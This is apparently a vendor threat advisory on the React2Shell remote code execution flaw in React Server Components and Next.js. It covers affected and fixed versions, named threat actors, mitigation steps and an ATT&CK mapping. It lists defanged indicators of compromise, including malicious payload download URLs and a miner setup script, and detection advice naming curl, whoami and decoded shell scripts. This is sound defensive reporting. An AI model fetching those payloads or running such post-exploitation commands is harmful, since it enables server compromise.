Comprehensive Threat Exposure Management Platform
Hive Pro recognized in Gartner® Magic Quadrant™ for Exposure Assessment Platform, 2025 Watch platform in action
CVE-2025-55182, known as React2Shell, is a critical CVSS 10.0 unauthenticated remote code execution vulnerability in Meta React Server Components caused by unsafe deserialization in the Flight protocol. This React2Shell vulnerability affects React 19.x versions and popular frameworks like Next.js 15.x and 16.x, allowing attackers to send crafted POST requests that trigger arbitrary server-side JavaScript execution. The React2Shell flaw leads to widespread, near-reliable compromise of internet-exposed React applications with minimal effort. Rapid React2Shell exploitation began within days of public disclosure on December 3, 2025, with multiple threat actors including Earth Lamia, Jackpot Panda, and UNC5174 deploying cryptominers, webshells, Cobalt Strike beacons, and persistent backdoors. The React vulnerability was added to CISA KEV catalog on December 5, 2025, followed by mass exploitation observed globally on December 8, 2025. Immediate patching to fixed React Server Components versions including React 19.0.1, 19.1.2, or 19.2.1 and Next.js versions like 15.5.7 or 16.0.7, along with WAF protections and aggressive security monitoring, is critical to mitigate ongoing React2Shell mass scanning and attack campaigns.
CVE-2025-55182, also called React2Shell, is a critical unauthenticated remote code execution vulnerability in React Server Components rated CVSS 10.0. The React2Shell issue stems from unsafe deserialization within the RSC Flight protocol, where server-function HTTP payloads are accepted and processed without proper input validation. This React vulnerability affects React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and packages such as react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Frameworks that bundle these React packages, including Next.js 15.x and 16.x using the App Router, are vulnerable by default to React2Shell attacks, making the security exposure extremely widespread across modern web applications built with React Server Components.
The React2Shell vulnerability enables attackers to send crafted POST requests to exposed RSC endpoints, triggering arbitrary JavaScript execution on the server with near-perfect reliability and no authentication required. Following public disclosure of React2Shell on December 3, 2025, exploitation began within days, with mass scanning and opportunistic attacks observed across the internet targeting vulnerable React applications. Because many organizations do not realize their applications rely on React Server Components internally, millions of websites became vulnerable automatically through Next.js and other framework defaults that enable RSC functionality without explicit developer configuration.
Real-world React2Shell exploitation has escalated rapidly following public disclosure. Attackers commonly perform reconnaissance using commands like uname, id, and whoami, often base64-encoded to evade detection, before deploying cryptominers, webshells, Cobalt Strike beacons, and persistent backdoors on compromised React servers. Multiple sophisticated threat actors, including China-nexus groups such as Earth Lamia, Jackpot Panda, and UNC5174 (also known as Uteus and CL-STA-1015), have weaponized the React2Shell flaw for espionage and cryptocurrency mining operations. The rapid weaponization demonstrates the severity and ease of exploiting this React vulnerability in internet-facing applications.
Mitigation of React2Shell requires immediate patching to secure React Server Components versions. React should be updated to versions 19.0.1, 19.1.2, or 19.2.1, and Next.js should be updated to versions like 15.5.7, 16.0.7, or later releases which contain the official React2Shell fixes. Organizations unable to patch React applications instantly should deploy WAF rules including AWS WAF AWSManagedRulesKnownBadInputsRuleSet version 1.24 or later, network signatures, and endpoint monitoring to block malicious React2Shell payloads. Given the active exploitation and large attack surface across React and Next.js applications, security teams should prioritize asset inventories identifying RSC usage, continuous vulnerability scanning, and log analysis to prevent or disrupt ongoing React2Shell compromise attempts.
Apply Patched React and Next.js Versions Immediately: Ensure all applications using React Server Components are upgraded to the fixed versions released in early December 2025 to remediate React2Shell. Update React to 19.0.1, 19.1.2, or 19.2.1, and update Next.js to 15.5.7, 16.0.7, or later. After updating React packages, perform a full rebuild and redeployment of your application workloads. Validate the updated package versions in package.json, lockfiles, and CI/CD build artifacts to confirm that no React2Shell vulnerable versions remain in production use.
Inventory and Audit RSC Usage: Identify all applications using React Server Components across your environment. This includes not just Next.js applications but also React Router, Waku, RedwoodSDK, and any custom implementations using react-server-dom-webpack, react-server-dom-parcel, or react-server-dom-turbopack packages. Prioritize internet-facing React applications for immediate React2Shell patching to reduce attack surface exposure.
Enable WAF Protections: If using Cloudflare, AWS WAF, or Vercel, enable RSC protection rules immediately to mitigate React2Shell exploitation attempts. AWS WAF AWSManagedRulesKnownBadInputsRuleSet version 1.24 or later includes updated rules specifically for CVE-2025-55182. These WAF protections provide defense-in-depth against React2Shell attacks but are not substitutes for applying official React and Next.js patches.
Enable Runtime Monitoring for Node.js Process Abuse: Configure your EDR or cloud workload protection tools to alert on unusual child processes spawned by Node.js runtimes, including shells, package managers, or network utilities. React2Shell exploitation frequently results in runtime execution of reconnaissance commands such as uname, whoami, curl, and base64-decoded scripts. Monitoring for these suspicious behaviors provides early detection of ongoing or successful React2Shell exploitation attempts against your infrastructure.
IPv4 Addresses: 206[.]237.3.150, 45[.]77.33.136, 143[.]198.92.82, 183[.]6.80.214, 115[.]42[.]60[.]223, 140[.]99[.]223[.]178, 156[.]234[.]209[.]103, 38[.]162[.]112[.]141, 45[.]32[.]158[.]54, 46[.]36[.]37[.]85, 47[.]84[.]79[.]46, 95[.]169[.]180[.]135, 45.134.174[.]235
URLs: hxxp://46[.]36[.]37[.]85:12000/sex[.]sh, hxxp://115[.]42[.]60[.]223:61236/slt, hxxp://45[.]32[.]158[.]54/5e51aff54626ef7f/x86_64, hxxp://156[.]234[.]209[.]103:20912/get[.]sh, hxxp://95[.]169[.]180[.]135:8443/pamssod, hxxp://res[.]qiqigece[.]top/nginx1, hxxps://raw[.]githubusercontent[.]com/C3Pool/xmrig_setup/master/setup_c3pool_miner[.]sh, hxxps://sup001[.]oss-cnhongkong[.]aliyuncs[.]com/123/python1[.]sh
Domains: reactcdn[.]windowserrorapis[.]com, res[.]qiqigece[.]top
SHA256 Hashes: a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4, 4a759cbc219bcb3a1f8380a959307b39873fb36a9afd0d57ba0736ad7a02763b, and numerous additional file hashes associated with React2Shell exploitation campaigns
React2Shell exploitation demonstrates tactics spanning Resource Development (TA0042) including Obtain Capabilities through Exploits (T1588.005) and Vulnerabilities (T1588.006), Initial Access (TA0001) via Exploit Public-Facing Application (T1190), Execution (TA0002) through Command and Scripting Interpreter including JavaScript (T1059.007) and Unix Shell (T1059.004), Persistence (TA0003) including Server Software Component and Web Shell (T1505, T1505.003), Privilege Escalation (TA0004) via Exploitation for Privilege Escalation (T1068), Defense Evasion (TA0005) using Masquerading (T1036), Impact (TA0040) through Resource Hijacking for cryptocurrency mining (T1496), Discovery (TA0007) including System Information Discovery (T1082), Process Discovery (T1057), and File and Directory Discovery (T1083), Collection (TA0009), Command and Control (TA0011) via Application Layer Protocol and Web Protocols (T1071, T1071.001), Exfiltration (TA0010) including Exfiltration Over C2 Channel (T1041) and Exfiltration Over Web Service (T1567), and Ingress Tool Transfer (T1105) for deploying additional malicious payloads.
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
https://github.com/rapid7/metasploit-framework/pull/20747
https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/
Get through updates and upcoming events, and more directly in your inbox